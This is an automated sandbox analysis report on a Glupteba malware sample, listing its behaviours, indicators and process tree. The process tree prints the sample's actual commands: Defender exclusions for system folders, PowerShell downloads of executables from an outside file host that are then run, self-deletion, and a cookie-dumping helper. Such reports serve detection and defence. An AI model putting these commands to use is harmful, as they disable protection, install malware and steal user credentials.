glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ZacL18ohdKBx4lz8LjtZSN5o.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	r3O7yjqLWLmvYiRrqSbQ69Zw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	r3O7yjqLWLmvYiRrqSbQ69Zw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	S_5AT3vdAotHYXPHnzUYoBiL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	S_5AT3vdAotHYXPHnzUYoBiL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ZacL18ohdKBx4lz8LjtZSN5o.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\International\Geo\Nation	Setup (2).exe

Loads dropped DLL 31 IoCs

pid	Process
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
768	Setup (2).exe
2436	PfbJ32NdSSR4m9dv3xK9bqYM.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4384	icacls.exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral23/files/0x000300000001318f-111.dat	themida
behavioral23/files/0x000300000001318f-107.dat	themida
behavioral23/files/0x0003000000013181-98.dat	themida
behavioral23/files/0x0003000000013184-94.dat	themida
behavioral23/files/0x0003000000013181-82.dat	themida
behavioral23/files/0x0003000000013184-81.dat	themida
behavioral23/files/0x00040000000055d0-160.dat	themida
behavioral23/memory/2304-187-0x0000000000260000-0x0000000000261000-memory.dmp	themida
behavioral23/files/0x00040000000055d0-155.dat	themida

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	r3O7yjqLWLmvYiRrqSbQ69Zw.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	S_5AT3vdAotHYXPHnzUYoBiL.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ZacL18ohdKBx4lz8LjtZSN5o.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 19 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
209	ipinfo.io
224	ipinfo.io
452	api.2ip.ua
664	ipinfo.io
134	ipinfo.io
175	ipinfo.io
194	ipinfo.io
21	ipinfo.io
189	ipinfo.io
195	ipinfo.io
426	ipinfo.io
429	ipinfo.io
427	ipinfo.io
453	api.2ip.ua
543	api.2ip.ua
662	ipinfo.io
20	ipinfo.io
127	ip-api.com
130	ipinfo.io

Program crash 6 IoCs

pid	pid_target	Process	procid_target
2760	988	WerFault.exe	48
3516	2052	WerFault.exe	90
4644	3276	WerFault.exe	119
4848	3708	WerFault.exe	111
4100	1656	WerFault.exe	83
2636	4676	WerFault.exe	216

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
1392	r3O7yjqLWLmvYiRrqSbQ69Zw.exe
1540	S_5AT3vdAotHYXPHnzUYoBiL.exe
2304	ZacL18ohdKBx4lz8LjtZSN5o.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	O_gS78RApzvvZLqQ__zh7Gf0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	QBmnNS3g2G93pqXwzBrQI8hw.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	QBmnNS3g2G93pqXwzBrQI8hw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	QBmnNS3g2G93pqXwzBrQI8hw.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
4904	schtasks.exe
316	schtasks.exe
2704	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5056	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
3752	taskkill.exe
2180	taskkill.exe
112	taskkill.exe
2324	taskkill.exe
4028	taskkill.exe
2660	taskkill.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Setup (2).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup (2).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	Setup (2).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Setup (2).exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Setup (2).exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4636	PING.EXE

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	666	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	133	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	139	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	176	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	193	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	208	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	428	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	663	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
768	Setup (2).exe
1600	QBmnNS3g2G93pqXwzBrQI8hw.exe
1600	QBmnNS3g2G93pqXwzBrQI8hw.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 768 wrote to memory of 1608	768	Setup (2).exe	44
PID 768 wrote to memory of 1608	768	Setup (2).exe	44
PID 768 wrote to memory of 1608	768	Setup (2).exe	44
PID 768 wrote to memory of 1608	768	Setup (2).exe	44
PID 768 wrote to memory of 532	768	Setup (2).exe	43
PID 768 wrote to memory of 532	768	Setup (2).exe	43
PID 768 wrote to memory of 532	768	Setup (2).exe	43
PID 768 wrote to memory of 532	768	Setup (2).exe	43
PID 768 wrote to memory of 1600	768	Setup (2).exe	42
PID 768 wrote to memory of 1600	768	Setup (2).exe	42
PID 768 wrote to memory of 1600	768	Setup (2).exe	42
PID 768 wrote to memory of 1600	768	Setup (2).exe	42
PID 768 wrote to memory of 1624	768	Setup (2).exe	41
PID 768 wrote to memory of 1624	768	Setup (2).exe	41
PID 768 wrote to memory of 1624	768	Setup (2).exe	41
PID 768 wrote to memory of 1624	768	Setup (2).exe	41
PID 768 wrote to memory of 1684	768	Setup (2).exe	40
PID 768 wrote to memory of 1684	768	Setup (2).exe	40
PID 768 wrote to memory of 1684	768	Setup (2).exe	40
PID 768 wrote to memory of 1684	768	Setup (2).exe	40
PID 768 wrote to memory of 1956	768	Setup (2).exe	38
PID 768 wrote to memory of 1956	768	Setup (2).exe	38
PID 768 wrote to memory of 1956	768	Setup (2).exe	38
PID 768 wrote to memory of 1956	768	Setup (2).exe	38
PID 768 wrote to memory of 2008	768	Setup (2).exe	39
PID 768 wrote to memory of 2008	768	Setup (2).exe	39
PID 768 wrote to memory of 2008	768	Setup (2).exe	39
PID 768 wrote to memory of 2008	768	Setup (2).exe	39
PID 768 wrote to memory of 1540	768	Setup (2).exe	37
PID 768 wrote to memory of 1540	768	Setup (2).exe	37
PID 768 wrote to memory of 1540	768	Setup (2).exe	37
PID 768 wrote to memory of 1540	768	Setup (2).exe	37
PID 768 wrote to memory of 1540	768	Setup (2).exe	37
PID 768 wrote to memory of 1540	768	Setup (2).exe	37
PID 768 wrote to memory of 1540	768	Setup (2).exe	37
PID 768 wrote to memory of 1104	768	Setup (2).exe	36
PID 768 wrote to memory of 1104	768	Setup (2).exe	36
PID 768 wrote to memory of 1104	768	Setup (2).exe	36
PID 768 wrote to memory of 1104	768	Setup (2).exe	36
PID 768 wrote to memory of 1104	768	Setup (2).exe	36
PID 768 wrote to memory of 1104	768	Setup (2).exe	36
PID 768 wrote to memory of 1104	768	Setup (2).exe	36
PID 768 wrote to memory of 948	768	Setup (2).exe	35
PID 768 wrote to memory of 948	768	Setup (2).exe	35
PID 768 wrote to memory of 948	768	Setup (2).exe	35
PID 768 wrote to memory of 948	768	Setup (2).exe	35
PID 768 wrote to memory of 1520	768	Setup (2).exe	33
PID 768 wrote to memory of 1520	768	Setup (2).exe	33
PID 768 wrote to memory of 1520	768	Setup (2).exe	33
PID 768 wrote to memory of 1520	768	Setup (2).exe	33
PID 768 wrote to memory of 548	768	Setup (2).exe	31
PID 768 wrote to memory of 548	768	Setup (2).exe	31
PID 768 wrote to memory of 548	768	Setup (2).exe	31
PID 768 wrote to memory of 548	768	Setup (2).exe	31
PID 768 wrote to memory of 988	768	Setup (2).exe	48
PID 768 wrote to memory of 988	768	Setup (2).exe	48
PID 768 wrote to memory of 988	768	Setup (2).exe	48
PID 768 wrote to memory of 988	768	Setup (2).exe	48
PID 768 wrote to memory of 1392	768	Setup (2).exe	47
PID 768 wrote to memory of 1392	768	Setup (2).exe	47
PID 768 wrote to memory of 1392	768	Setup (2).exe	47
PID 768 wrote to memory of 1392	768	Setup (2).exe	47
PID 768 wrote to memory of 1392	768	Setup (2).exe	47
PID 768 wrote to memory of 1392	768	Setup (2).exe	47

C:\Users\Admin\AppData\Local\Temp\Setup (2).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (2).exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:768
- C:\Users\Admin\Documents\2KH9Ola4Aezhf_1cFe1S3UFU.exe
  "C:\Users\Admin\Documents\2KH9Ola4Aezhf_1cFe1S3UFU.exe"
  2⤵
  - Executes dropped EXE
  PID:548
- - C:\Users\Admin\AppData\Roaming\8843003.exe
    "C:\Users\Admin\AppData\Roaming\8843003.exe"
    3⤵
    PID:1656
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1656 -s 1688
      4⤵
      Program crash
      PID:4100
- - C:\Users\Admin\AppData\Roaming\7926335.exe
    "C:\Users\Admin\AppData\Roaming\7926335.exe"
    3⤵
    PID:2052
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:740
- - C:\Users\Admin\AppData\Roaming\3189070.exe
    "C:\Users\Admin\AppData\Roaming\3189070.exe"
    3⤵
    PID:3004
- C:\Users\Admin\Documents\T8k7ARFu_RJ2iwP6M0r7NQjV.exe
  "C:\Users\Admin\Documents\T8k7ARFu_RJ2iwP6M0r7NQjV.exe"
  2⤵
  - Executes dropped EXE
  PID:1520
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
    3⤵
    PID:5068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      4⤵
      PID:3384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      4⤵
      PID:2516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      4⤵
      PID:4988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
      4⤵
      PID:316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
      4⤵
      PID:4852
- C:\Users\Admin\Documents\Fwuj4bumzsRpXPg_ZOr5iCdy.exe
  "C:\Users\Admin\Documents\Fwuj4bumzsRpXPg_ZOr5iCdy.exe"
  2⤵
  - Executes dropped EXE
  PID:948
- - C:\Users\Admin\Documents\Fwuj4bumzsRpXPg_ZOr5iCdy.exe
    "C:\Users\Admin\Documents\Fwuj4bumzsRpXPg_ZOr5iCdy.exe"
    3⤵
    PID:3912
- C:\Users\Admin\Documents\hgbDoMb7K4HpIH06e97NgIrQ.exe
  "C:\Users\Admin\Documents\hgbDoMb7K4HpIH06e97NgIrQ.exe"
  2⤵
  - Executes dropped EXE
  PID:1104
- C:\Users\Admin\Documents\S_5AT3vdAotHYXPHnzUYoBiL.exe
  "C:\Users\Admin\Documents\S_5AT3vdAotHYXPHnzUYoBiL.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1540
- C:\Users\Admin\Documents\VRyMLCGXgbI7yxT5CUQ8JIOp.exe
  "C:\Users\Admin\Documents\VRyMLCGXgbI7yxT5CUQ8JIOp.exe"
  2⤵
  - Executes dropped EXE
  PID:1956
- C:\Users\Admin\Documents\Y0Er8QqnUWE4byJJzEPqMNPb.exe
  "C:\Users\Admin\Documents\Y0Er8QqnUWE4byJJzEPqMNPb.exe"
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Users\Admin\Documents\hbWkFb6uiunCYc0rg37w7vqG.exe
  "C:\Users\Admin\Documents\hbWkFb6uiunCYc0rg37w7vqG.exe"
  2⤵
  - Executes dropped EXE
  PID:1684
- - C:\Users\Admin\Documents\hbWkFb6uiunCYc0rg37w7vqG.exe
    C:\Users\Admin\Documents\hbWkFb6uiunCYc0rg37w7vqG.exe
    3⤵
    PID:1788
- C:\Users\Admin\Documents\poJ4q_F53597NZejBYdMOGPa.exe
  "C:\Users\Admin\Documents\poJ4q_F53597NZejBYdMOGPa.exe"
  2⤵
  - Executes dropped EXE
  PID:1624
- - C:\Users\Admin\Documents\poJ4q_F53597NZejBYdMOGPa.exe
    C:\Users\Admin\Documents\poJ4q_F53597NZejBYdMOGPa.exe
    3⤵
    PID:2040
- C:\Users\Admin\Documents\QBmnNS3g2G93pqXwzBrQI8hw.exe
  "C:\Users\Admin\Documents\QBmnNS3g2G93pqXwzBrQI8hw.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  PID:1600
- C:\Users\Admin\Documents\GtbvEY7giyxz8C0h1g4ChtyU.exe
  "C:\Users\Admin\Documents\GtbvEY7giyxz8C0h1g4ChtyU.exe"
  2⤵
  - Executes dropped EXE
  PID:532
- - C:\Users\Admin\Documents\GtbvEY7giyxz8C0h1g4ChtyU.exe
    C:\Users\Admin\Documents\GtbvEY7giyxz8C0h1g4ChtyU.exe
    3⤵
    PID:908
- C:\Users\Admin\Documents\ejX6fy5T0Rwefu3U19FImycC.exe
  "C:\Users\Admin\Documents\ejX6fy5T0Rwefu3U19FImycC.exe"
  2⤵
  - Executes dropped EXE
  PID:1608
- - C:\Users\Admin\Documents\ejX6fy5T0Rwefu3U19FImycC.exe
    C:\Users\Admin\Documents\ejX6fy5T0Rwefu3U19FImycC.exe
    3⤵
    PID:340
- C:\Users\Admin\Documents\r3O7yjqLWLmvYiRrqSbQ69Zw.exe
  "C:\Users\Admin\Documents\r3O7yjqLWLmvYiRrqSbQ69Zw.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1392
- C:\Users\Admin\Documents\xPaDWHFCZZQUFZAUpxiUJJMW.exe
  "C:\Users\Admin\Documents\xPaDWHFCZZQUFZAUpxiUJJMW.exe"
  2⤵
  - Executes dropped EXE
  PID:988
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 988 -s 880
    3⤵
    - Program crash
    PID:2760
- C:\Users\Admin\Documents\phoPRP4GciAQMAE9NFtW5gRJ.exe
  "C:\Users\Admin\Documents\phoPRP4GciAQMAE9NFtW5gRJ.exe"
  2⤵
  - Executes dropped EXE
  PID:2208
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "phoPRP4GciAQMAE9NFtW5gRJ.exe" /f & erase "C:\Users\Admin\Documents\phoPRP4GciAQMAE9NFtW5gRJ.exe" & exit
    3⤵
    PID:2220
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "phoPRP4GciAQMAE9NFtW5gRJ.exe" /f
      4⤵
      Kills process with taskkill
      PID:2660
- C:\Users\Admin\Documents\7nucaaDdiZ7uWMkxrlLw9vhm.exe
  "C:\Users\Admin\Documents\7nucaaDdiZ7uWMkxrlLw9vhm.exe"
  2⤵
  - Executes dropped EXE
  PID:2196
- C:\Users\Admin\Documents\pIgknrzoTZlAmK2ZgDORyJMK.exe
  "C:\Users\Admin\Documents\pIgknrzoTZlAmK2ZgDORyJMK.exe"
  2⤵
  - Executes dropped EXE
  PID:2188
- - C:\Users\Admin\Documents\pIgknrzoTZlAmK2ZgDORyJMK.exe
    "C:\Users\Admin\Documents\pIgknrzoTZlAmK2ZgDORyJMK.exe" -q
    3⤵
    PID:2452
- C:\Users\Admin\Documents\O_gS78RApzvvZLqQ__zh7Gf0.exe
  "C:\Users\Admin\Documents\O_gS78RApzvvZLqQ__zh7Gf0.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2320
- - C:\Program Files (x86)\Company\NewProduct\jooyu.exe
    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
    3⤵
    PID:2612
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:3016
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:1036
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:5052
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:3372
- - C:\Program Files (x86)\Company\NewProduct\customer3.exe
    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
    3⤵
